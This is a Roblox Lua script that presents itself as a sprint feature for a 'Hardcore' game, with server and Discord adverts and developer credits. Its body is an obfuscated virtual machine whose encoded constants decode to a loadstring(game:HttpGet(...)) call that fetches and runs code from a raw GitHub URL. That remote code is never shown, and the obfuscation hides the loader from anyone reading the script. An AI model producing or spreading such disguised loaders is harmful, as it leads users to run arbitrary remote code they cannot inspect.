---JOIN THE OFFICIAL HARDCORE PRIVATE SERVER FOR EASY MATCHMAKING AND PLAYING WITH RANDOMS!
---Official Private Server:  https://www.roblox.com/games/6516141723?privateServerLinkCode=73109408374654121964289352839616


---Join The Official Hardcore discord and Silly Billy Studios discord :epic:
--Join now https://discord.gg/jAWv5rDa7X


--Q to sprint fatties


do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (0==v0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (2==v0) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (5==v0) then v16=nil;v16=function(v25,v26,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (3==v27) then v34=function()local v48=v33();local v49=v33();local v50=(1046 -(20 + 1025)) + 0 ;local v51=(v30(v49,1 -0 ,14 + 6 ) * ((5 -(7 -4))^(47 -15))) + v48 ;local v52=v30(v49,47 -26 ,56 -25 );local v53=((v30(v49,113 -81 )==(2 -(1 -0))) and  -(1 + 0)) or (553 -(458 + 94)) ;if (v52==(0 -0)) then if (v51==(175 -(113 + 62))) then return v53 * (0 -0) ;else v52=2 -1 ;v50=0 + 0 ;end elseif (v52==(6581 -4534)) then return ((v51==(778 -(348 + (1168 -738)))) and (v53 * ((2 -1)/(0 -0)))) or (v53 * NaN) ;end return v9(v53,v52-(868 + 155) ) * (v50 + (v51/((4 -2)^(15 + 18 + 19)))) ;end;v35=nil;v35=function(v40)local v54=1615 -(1529 + 86) ;local v55;local v56;while true do if ((1343 -((2699 -1722) + 366))==v54) then v55=nil;if  not v40 then local v105=0;while true do if (v105==(0 + 0)) then v40=v33();if (v40==(0 + (1755 -(849 + 906)))) then return "";end break;end end end v54=2 -1 ;end if (v54==(2 -0)) then v56={};for v101=1, #v55 do v56[v101]=v3(v2(v4(v55,v101,v101)));end v54=127 -(99 + (1940 -(1892 + 23))) ;end if (v54==(920 -(364 + 555))) then v55=v4(v25,v28,(v28 + v40) -(1 + 0) );v28=v28 + v40 ;v54=2;end if (v54==(5 -2)) then return v7(v56);end end end;v36=v33;v27=4;end if (v27==5) then v39=nil;v39=function(v41,v42,v43)local v57=v41[1];local v58=v41[2];local v59=v41[3];return function(...)local v75=1;local v76= -1;local v77={...};local v78=v13("#",...) -1 ;local function v79()local v80=v57;local v81=v58;local v82=v59;local v83=v37;local v84={};local v85={};local v86={};for v95=323 -(81 + 242) ,v78 do if (((594 + 1116)>(1411 + 246)) and (v95>=v82)) then v84[v95-v82 ]=v77[v95 + 1 + 0 ];else v86[v95]=v77[v95 + (4 -3) ];end end local v87=(v78-v82) + (1215 -((135 -(68 + 5)) + (2895 -1743))) ;local v88;local v89;while true do local v96=0 -0 ;local v97;while true do if ((v96==((0 -0) -0)) or ((5564 -(458 + 139))<4683)) then v97=0;while true do if (((4284 -(431 + 93))>=(758 -600)) and (v97==(0 + 0))) then local v111=0 + 0 ;while true do if ((v111==(2 -1)) or ((3555 + 1285)==(2711 + 1410))) then v97=1 + 0 ;break;end if ((v111==(0 -(0 -0))) or ((4970 -(4501 -(723 + 625)))>(1734 + 1397))) then local v113=0 -(0 + 0) ;while true do if ((v113==1) or ((2521 -(18 + 151))>=(11175 -8582))) then v111=(1004 -(746 + 257)) + 0 ;break;end if ((v113==0) or (1548>=(1135 + 883))) then v88=v80[v75];v89=v88[1 + (0 -0) ];v113=1;end end end end end if (((9214 -4876)==(130 + 4208)) and (v97==(1 -0))) then if ((v89<=3) or ((1944 -830)>(2115 -(44 + 701)))) then if ((v89<=(322 -(111 + 210))) or ((1078 + 1820)<(401 + 1900))) then if (((5063 -(395 + 400))>=(1702 + (1510 -908))) and (v89==0)) then v86[v88[2 -0 ]]=v43[v88[1831 -(449 + (2321 -(127 + 815))) ]];else v86[v88[4 -2 ]]=v88[8 -5 ];end elseif ((672<(6762 -4754)) and (v89==((3 -1) + 0))) then v86[v88[614 -(519 + 93) ]]();else local v121=0 + 0 ;local v122;while true do if ((v121==(0 + 0)) or ((7920 -5174)==(1075 -342))) then v122=v88[2];v86[v122]=v86[v122](v14(v86,v122 + (4 -3) ,v76));break;end end end elseif ((v89<=(5 + 0)) or (4357<=(1502 -(19 + 88)))) then if ((v89==(11 -7)) or ((2805 -(246 + 327))<=1742)) then local v123=1914 -(791 + 1123) ;local v124;local v125;local v126;local v127;local v128;while true do if ((v123==(1 + 0)) or (3252<=(11352 -8238))) then local v154=743 -(482 + 261) ;while true do if ((v154==(0 + (1830 -(653 + 1177)))) or ((219 + 405 + 77 + 61)==(4467 -((1175 -(552 + 66)) + 130)))) then v126=nil;v127=nil;v154=1 -0 ;end if (((5950 -(411 + 988))<((7983 -2402) -(18 + 634))) and (v154==(126 -(120 + 5)))) then v123=2 + 0 ;break;end end end if (((7 + 22)<((631 -(57 + 181)) + 921)) and (v123==(2 -0))) then v128=nil;while true do if ((v124==(1511 -(1163 + 346))) or ((4748 -2563)==(196 + 74))) then for v166=v125,v76 do local v167=0 + 0 ;local v168;local v169;while true do if ((v167==(1369 -(1265 + 104))) or ((5157 -2641)==(10288 -7655))) then v168=1013 -(57 + 956) ;v169=nil;v167=1573 -(1430 + 142) ;end if ((v167==(1 + 0)) or ((1155 -404)==(1834 -(137 + 63)))) then while true do if ((((3783 -(1227 + 213)) -((2019 -(1088 + 846)) + 170))>(523 -(173 + 48))) and ((0 -0)==v168)) then v169=1146 -(28 + 1118) ;while true do if (((1165 -(343 + 822))==v169) or ((11854 -9211)==(3808 -1767))) then v128=v128 + 1 + 0 ;v86[v166]=v126[v128];break;end end break;end end break;end end end break;end if (((3980 -(289 + 753))<=(3394 -(158 + (495 -330)))) and (v124==(2 -1))) then local v157=0 + 0 ;local v158;while true do if (((2429 -(515 + 80))<((2593 + 699) -((946 -445) + 450))) and (v157==(251 -(241 + 10)))) then v158=(0 -0) -0 ;while true do if ((v158==0) or ((5824 -(981 + 533))==408)) then v76=(v127 + v125) -(1 + 0) ;v128=0;v158=286 -(38 + 247) ;end if ((((540 -429) -29)<=(38 + 36 + 199 + 21)) and (v158==(3 -2))) then v124=904 -(616 + 286) ;break;end end break;end end end if (((6116 -(153 + 435 + 1196))>=4239) and (v124==(46 -(25 + 21)))) then local v159=0 + (0 -0) ;while true do if ((v159==0) or ((12110 -9492)>(12429 -7843))) then v125=v88[1325 -(1019 + (486 -182)) ];v126,v127=v83(v86[v125](v14(v86,v125 + (1512 -((2822 -1680) + 369)) ,v88[309 -(185 + 121) ])));v159=174 -(83 + 46 + 16 + 28) ;end if (((9150 -4765)<(6261 -(379 + 889))) and (v159==(1 + 0 + 0))) then v124=1;break;end end end end break;end if ((v123==(627 -(303 + 324))) or ((3810 -1131)==(542 + 582))) then v124=1761 -(940 + (2089 -(268 + 1000))) ;v125=nil;v123=424 -(206 + 217) ;end end else do return;end end elseif (((8360 -4674)>(260 + 1183)) and (v89>(1388 -(54 + 1328)))) then v86[v88[2]]=v88[3 + 0 + 0 ]~=(0 -0) ;else local v130=437 -(177 + (1035 -(602 + 173))) ;local v131;local v132;local v133;while true do if (((0 + 0 + 0)==v130) or (247>=(4990 -1573))) then local v155=0 + 0 ;while true do if ((v155==(1 + 0)) or (4869<=((1393 -589) + 2098))) then v130=1;break;end if (((540 + (3189 -(1147 + 433)))<=(2908 -(9 + 65))) and (v155==(0 -0))) then v131=344 -(24 + 320) ;v132=nil;v155=1 + 0 ;end end end if ((((4518 + 149) -(339 + 21))==((41162 -21322) -15533)) and (v130==(1 + 0))) then v133=nil;while true do if (((852 + 1487)<(258 + 3042)) and (v131==((1176 -(452 + 21)) -(632 + 71)))) then local v160=0 -0 ;local v161;while true do if ((v160==(0 -0)) or ((2334 -1534)==(4900 -(60 + 648)))) then v161=0 -0 ;while true do if ((v161==(0 + 0)) or ((1150 -(758 + 31))>=1326)) then v132=v88[2];v133=v86[v88[3]];v161=1;end if (((2026 + 2681)>=(4565 -957)) and (v161==1)) then v131=4 -3 ;break;end end break;end end end if ((1==v131) or ((3953 -1754)>=(2170 + 1795))) then v86[v132 + 1 ]=v133;v86[v132]=v133[v88[1325 -(893 + 81 + 347) ]];break;end end break;end end end v75=v75 + (1787 -(1639 + 147)) ;break;end end break;end end end end A,B=v37(v12(v79));if  not A[1] then local v98=0;local v99;while true do if (0==v98) then v99=v41[4][v75] or "?" ;error("Script error at ["   .. v99   .. "]:"   .. A[2] );break;end end else return v14(A,2,B);end end;end;return v39(v38(),{},v26)(...);end if (v27==4) then v37=nil;v37=function(...)return {...},v13("#",...);end;v38=nil;v38=function()local v60=1815 -(161 + 1654) ;local v61;local v62;local v63;local v64;local v65;local v66;local v67;while true do if (v60==(1969 -(1438 + 531))) then v61=0;v62=nil;v60=1;end if (v60==3) then v67=nil;while true do local v103=0 + 0 ;local v104;while true do if (v103==(0 + 0)) then v104=0;while true do if ((1531 -(1418 + 112))==v104) then if (v61==(2 -1)) then local v114=1731 -(1375 + 356) ;while true do if (v114==(8 -6)) then v61=1855 -(431 + 1422) ;break;end if (v114==(2 -1)) then for v137=1563 -(126 + 1436) ,v66 do local v138=0;local v139;local v140;local v141;local v142;local v143;while true do if (v138==(1241 -(186 + 1053))) then v143=nil;while true do if (v139~=(3 -1)) then else while true do if (v140==1) then v143=nil;while true do if (v141~=(0 -0)) then else local v181=0 -0 ;local v182;local v183;while true do if (1~=v181) then else while true do if (v182==(0 + 0)) then v183=0;while true do if (v183~=0) then else local v203=0;while true do if (v203~=(1 + 0)) then else v183=1;break;end if (v203==(978 -(514 + 464))) then v142=v31();v143=nil;v203=1 + 0 ;end end end if ((2 -1)==v183) then v141=1;break;end end break;end end break;end if (v181~=0) then else v182=0;v183=nil;v181=1 -0 ;end end end if (v141==1) then if (v142==(2 -1)) then v143=v31()~=(1315 -(820 + 495)) ;elseif (v142==(1 + 1)) then v143=v34();elseif (v142~=3) then else v143=v35();end v67[v137]=v143;break;end end break;end if (v140==0) then local v177=0 -0 ;local v178;while true do if (v177~=(0 + 0)) then else v178=0;while true do if (v178==(1 -0)) then v140=1;break;end if (v178~=0) then else local v191=1283 -(629 + 654) ;while true do if (v191~=(1 + 0)) then else v178=2 -1 ;break;end if (v191==0) then v141=0 + 0 ;v142=nil;v191=1;end end end end break;end end end end break;end if (v139~=1) then else v142=nil;v143=nil;v139=2;end if ((0 -0)~=v139) then else v140=382 -(268 + 114) ;v141=nil;v139=1;end end break;end if (v138==1) then v141=nil;v142=nil;v138=1 + 1 ;end if (v138==0) then v139=0;v140=nil;v138=1 + 0 ;end end end v65[291 -(179 + 109) ]=v31();v114=95 -(5 + 88) ;end if (v114~=0) then else v66=v33();v67={};v114=1371 -(56 + 1314) ;end end end break;end if (v104~=(0 -0)) then else local v112=0;while true do if (v112~=(2 -1)) then else v104=1;break;end if (v112==(0 -0)) then if (v61==(0 + 0)) then local v135=700 -(690 + 10) ;local v136;while true do if (v135==0) then v136=0 + 0 ;while true do if (v136==(1 + 0)) then v64={};v65={v62,v63,nil,v64};v136=2;end if (v136==(2 + 0)) then v61=1 + 0 ;break;end if (v136==(0 -0)) then local v165=0 -0 ;while true do if (v165~=(0 -0)) then else v62={};v63={};v165=512 -(314 + 197) ;end if (v165==(1 + 0)) then v136=1 + 0 ;break;end end end end break;end end end if (v61==2) then for v144=2 -1 ,v33() do local v145=0 -0 ;local v146;local v147;while true do if (v145==1) then while true do if (v146~=(0 -0)) then else v147=v31();if (v30(v147,1,1)==(0 + 0)) then local v171=0;local v172;local v173;local v174;local v175;local v176;while true do if (v171==2) then v176=nil;while true do if (v172~=2) then else while true do if (v173~=(4 -1)) then else if (v30(v175,3,1075 -(693 + 379) )==1) then v176[1842 -(1090 + 748) ]=v67[v176[10 -6 ]];end v62[v144]=v176;break;end if (v173~=2) then else local v193=0;while true do if (0==v193) then local v201=0;while true do if (v201~=(1351 -(1202 + 148))) then else v193=2 -1 ;break;end if (v201~=(145 -(42 + 103))) then else if (v30(v175,1,2 -1 )==(2 -1)) then v176[1 + 1 ]=v67[v176[2]];end if (v30(v175,2,2)==1) then v176[12 -9 ]=v67[v176[3]];end v201=1;end end end if (v193~=(1283 -(261 + 1021))) then else v173=9 -6 ;break;end end end if (v173~=(1566 -(245 + 1320))) then else local v194=0;local v195;while true do if (v194==(0 -0)) then v195=295 -(195 + 100) ;while true do if (v195==1) then v173=2;break;end if (v195~=0) then else local v204=0;while true do if (v204==0) then v176={v32(),v32(),nil,nil};if (v174==0) then local v209=431 -(390 + 41) ;while true do if (v209==(0 -0)) then v176[3]=v32();v176[1392 -(633 + 755) ]=v32();break;end end elseif (v174==(915 -(563 + 351))) then v176[3]=v33();elseif (v174==(2 + 0)) then v176[3]=v33() -(2^16) ;elseif (v174==(2 + 1)) then local v214=0 + 0 ;local v215;local v216;local v217;while true do if (v214==0) then v215=0 -0 ;v216=nil;v214=2 -1 ;end if (v214==(735 -(471 + 263))) then v217=nil;while true do if ((132 -(42 + 90))==v215) then local v218=909 -(610 + 299) ;while true do if (v218==(1 + 0)) then v215=1;break;end if (v218==(0 -0)) then v216=0 -0 ;v217=nil;v218=1 + 0 ;end end end if (v215~=(2 -1)) then else while true do if (v216==0) then v217=0;while true do if (v217~=0) then else v176[3]=v33() -(2^(1767 -(617 + 1134))) ;v176[4]=v32();break;end end break;end end break;end end break;end end end v204=1 -0 ;end if (v204~=(1 + 0)) then else v195=3 -2 ;break;end end end end break;end end end if (v173==(0 + 0)) then local v196=0;local v197;local v198;while true do if (0==v196) then v197=0 + 0 ;v198=nil;v196=1;end if (v196==1) then while true do if (v197~=0) then else v198=0;while true do if (v198~=0) then else v174=v30(v147,1125 -(994 + 129) ,3);v175=v30(v147,4 + 0 ,2 + 4 );v198=1 + 0 ;end if (v198==(1 + 0)) then v173=1 -0 ;break;end end break;end end break;end end end end break;end if (v172==(0 + 0)) then local v185=0;local v186;while true do if (v185~=0) then else v186=0 + 0 ;while true do if (v186==(4 -3)) then v172=1619 -(311 + 1307) ;break;end if (v186==0) then local v202=0;while true do if (0~=v202) then else v173=0;v174=nil;v202=1269 -(569 + 699) ;end if (v202==1) then v186=1;break;end end end end break;end end end if (v172==(1 + 0)) then local v187=1388 -(24 + 1364) ;local v188;while true do if (v187==(0 -0)) then v188=0;while true do if (v188~=(1332 -(866 + 466))) then else v175=nil;v176=nil;v188=1 + 0 ;end if (v188==1) then v172=2;break;end end break;end end end end break;end if (v171==(1805 -(384 + 1421))) then v172=0;v173=nil;v171=1;end if (v171~=1) then else v174=nil;v175=nil;v171=2;end end end break;end end break;end if (v145==(1485 -(1283 + 202))) then local v156=0;while true do if (v156==(1110 -(230 + 879))) then v145=1;break;end if (v156==(0 + 0)) then v146=0 + 0 ;v147=nil;v156=2 -1 ;end end end end end for v148=1,v33() do v63[v148-1 ]=v38();end for v150=2 -1 ,v33() do v64[v150]=v33();end return v65;end v112=1;end end end end break;end end end break;end if (2==v60) then v65=nil;v66=nil;v60=3;end if (v60==1) then local v100=122 -(106 + 16) ;while true do if (v100~=0) then else v63=nil;v64=nil;v100=1;end if (v100==(1 -0)) then v60=7 -5 ;break;end end end end end;v27=5;end if (v27==1) then v30=function(v44,v45,v46)if v46 then local v90=(v44/((1043 -(755 + 286))^(v45-(1976 -((1754 -(32 + 542)) + 795)))))%((4 -2)^(((v46-(1332 -(695 + 636))) -(v45-(1 -0))) + 1 + 0)) ;return v90-(v90%(1 + 0 + 0)) ;else local v91=0 + 0 + 0 ;local v92;while true do if (v91==(0 + 0)) then v92=(1049 -(452 + 595))^(v45-(2 -1)) ;return (((v44%(v92 + v92))>=v92) and (1524 -(911 + 612))) or ((1534 -699) -(638 + 197)) ;end end end end;v31=nil;v31=function()local v68=v2(v25,v28,v28);v28=v28 + 1 ;return v68;end;v32=nil;v27=2;end if (v27==2) then v32=function()local v69,v70=v2(v25,v28,v28 + (5 -3) );v28=v28 + (569 -(398 + 169)) ;return (v70 * (891 -635)) + v69 ;end;v33=nil;v33=function()local v71,v72,v73,v74=v2(v25,v28,v28 + 2 + 1 );v28=v28 + 4 + 0 ;return (v74 * 16777216) + (v73 * (57793 + 7743)) + (v72 * (27 + 229)) + v71 ;end;v34=nil;v27=3;end if (v27==0) then v28=1;v29=nil;v25=v5(v4(v25,5),"..",function(v47)if (v2(v47,2)==79) then v29=v1(v4(v47,1,1));return "";else local v93=0;local v94;while true do if (v93==0) then v94=v3(v1(v47,16));if v29 then local v110=v6(v94,v29);v29=nil;return v110;else return v94;end break;end end end end);v30=nil;v27=1;end end end;v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403A43O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F746861747374696E6B6E2O6F6E2F5235584776696D596867774A4669646D3761482O697A7375703032644A77632O554E75685451554C485930526B575261727365384A4933303559543050797530364731486942506D6C7A794E5449475532746B4345747A5667622F6D61696E2F556D703171347376465434726357762O446B523900093O00124O00013O00122O000100023O002006000100010003001201000300044O0007000400014O0004000100044O00035O00022O00023O000100012O00053O00017O00093O00023O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end if (v0==3) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end end end


--credits
--Main Coder: Noonie Loafer
--Modeling, Art Direction and sound design: Ping (i also did some coding shut up)
--Misc Devs (also very cool people): RealCat, Muhammad and Crow With a Gun
